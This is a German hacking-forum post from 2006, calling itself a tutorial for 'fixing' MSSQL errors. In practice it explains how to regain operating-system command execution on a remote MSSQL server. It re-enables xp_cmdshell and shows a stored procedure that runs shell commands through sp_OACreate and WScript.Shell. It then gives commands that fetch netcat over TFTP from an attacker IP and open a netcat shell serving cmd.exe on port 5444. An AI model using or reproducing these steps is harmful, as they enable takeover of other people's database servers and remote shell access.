[Hacking] MSSQL Error fixxen

Dieses Thema im Forum "Security Tutorials" wurde erstellt von 00johnny00, 1. September 2006 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 1. September 2006
    MSSQL Error fixxen

    Ahoi,

    mal eine Variante SQL Error zu fixen...

    Code:
    
    Als erstes Installieren.
    
    
    1.start > programme > mssql > enterprise
    
    
    2.klick oben mal auf microsoft sql server > sql-servergruppe rechtsklick > neue sql server registrieren > ip eingeben
    
    3. dann weiter
    
    4. im zweiten fenster das untere auswählen
    
    5. daten eingeben, danach auf das "+" drücken
    
    6. dann auf datenbank>
    
    7. master >
    
    8. erweiterte prozeduren
    
    9. xp_cmdshell suchen ( sobald man die hat, zweimal drauf drücken )
    
    9. dann musst du nur noch die xplog70.dll suchen tip : die xplog ist immer mssql ordner, danach musste der sql error gefixxt sein
    
    ein kleines bsp: C:\Archivos de programa\Microsoft SQL Server\MSSQL$PADMINISTRATOR\Binn\xplog70.dll
    
    
    falls der nicht gefixxt sein sollte smile 2. versuch zwei minuten arbeit
    
    
    
    einfach query analyzer starten:
    
    sql daten eingeben
    
    dann neue prodezur erstellen:
    
    CREATE PROCEDURE fn_timedate(@cmd varchar(255), @Wait int = 0) AS
    --Create WScript.Shell object
    DECLARE @result int, @OLEResult int, @RunResult int
    DECLARE @ShellID int
    EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
    IF @OLEResult <> 0 SELECT @result = @OLEResult
    IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
    EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
    IF @OLEResult <> 0 SELECT @result = @OLEResult
    IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
    --If @OLEResult <> 0 EXEC sp_displayoaerrorinfo @ShellID, @OLEResult
    EXECUTE @OLEResult = sp_OADestroy @ShellID
    return @result
    
    
    so jetzt kannst du über query analyzer folgendes ausführen z.b :
    
    fn_timedate "tftp -i IP get netcat.exe"
    fn_timedate "nc -L -v -p 5444 -e cmd.exe 
    mfg johnny
     

  2. Anzeige

  3. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Hacking MSSQL Error
  1. MSSQL Hacking Tool

    Chrisomator , 30. Juni 2009 , im Forum: Linux & BSD
    Antworten:
    5
    Aufrufe:
    1.062
  2. Antworten:
    0
    Aufrufe:
    4.157
  3. Antworten:
    1
    Aufrufe:
    9.508
  4. Antworten:
    9
    Aufrufe:
    792
  5. Antworten:
    0
    Aufrufe:
    3.588